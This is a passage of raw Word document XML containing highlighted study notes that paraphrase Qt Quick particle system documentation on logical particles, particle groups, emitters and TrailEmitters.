      <w:bookmarkEnd w:id="767"/>
      <w:bookmarkEnd w:id="768"/>
      <w:bookmarkEnd w:id="769"/>
      <w:bookmarkEnd w:id="770"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All the particle system types act on "</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logical particles</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">". Every particle has a logical representation inside the particle system, and this is what the types act upon. </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Not every</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> logical particle needs to be </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visualized</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and some logical particles </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>could lead to multiple visual particles</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> being drawn on screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="771" w:name="particle-groups"/>
      <w:bookmarkStart w:id="772" w:name="_Toc483000694"/>
      <w:bookmarkStart w:id="773" w:name="_Toc483003711"/>
      <w:bookmarkStart w:id="774" w:name="_Toc483604046"/>
      <w:bookmarkStart w:id="775" w:name="_Toc483605266"/>
      <w:bookmarkEnd w:id="771"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Particle Groups</w:t>
      </w:r>
      <w:bookmarkEnd w:id="772"/>
      <w:bookmarkEnd w:id="773"/>
      <w:bookmarkEnd w:id="774"/>
      <w:bookmarkEnd w:id="775"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="004375A9" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Every logical particle is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a particle group, and each group is identified by a </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If no other group has been specified, a logical particle belongs to the group with </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name ""</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the empty string), which acts the same as any other group. Groups are used for </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two purposes</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, for </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>controlling</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> particles and because they can have </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stochastic state transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Groups control particles because you </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can never access</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an individual particle with any of the particle system types. All types act on groups as a whole, and so any particles that </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to behave differently</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from each other (aside from the usual stochastic parameter variation) will need to be </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in different groups</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Particles can also </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>change groups dynamically</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When this happens the particles </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trajectory</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is unaltered, but it can be acted upon by different</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId577" w:anchor="particlepainters" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainters</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Affectors. Particles can either have their group changed by an Affector, or stochastic state transitions can be defined in a</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId578" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="004375A9" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Generally, </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>groups should only be defined in a</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId579" w:history="1">
        <w:r w:rsidRPr="004375A9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if they require stochastic state transitions. Otherwise, it is sufficient to have the groups be defined simply by the strings used in the particle/particles properties of the types.</w:t>
      </w:r>
      <w:r w:rsidR="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004375A9" w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using conte</w:t>
      </w:r>
      <w:r w:rsidR="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xt of particle groups.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="776" w:name="emitters"/>
      <w:bookmarkStart w:id="777" w:name="_Toc483000695"/>
      <w:bookmarkStart w:id="778" w:name="_Toc483003712"/>
      <w:bookmarkStart w:id="779" w:name="_Toc483604047"/>
      <w:bookmarkStart w:id="780" w:name="_Toc483605267"/>
      <w:bookmarkEnd w:id="776"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Emitters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="777"/>
      <w:bookmarkEnd w:id="778"/>
      <w:bookmarkEnd w:id="779"/>
      <w:bookmarkEnd w:id="780"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Emitters </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emit logical particles into the system</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These particles have a </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trajectory</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lifespan</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no visualization</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These particles are emitted from the </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>location of the Emitter</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="004375A9" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TrailEmitters</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a special type of emitter which emits particles from the location of other logicial particles. Any logical particle of the followed type within the bounds of a</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId580" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will cause particle emission from its location, as if there were an Emitter on it with the same properties as the</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId581" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
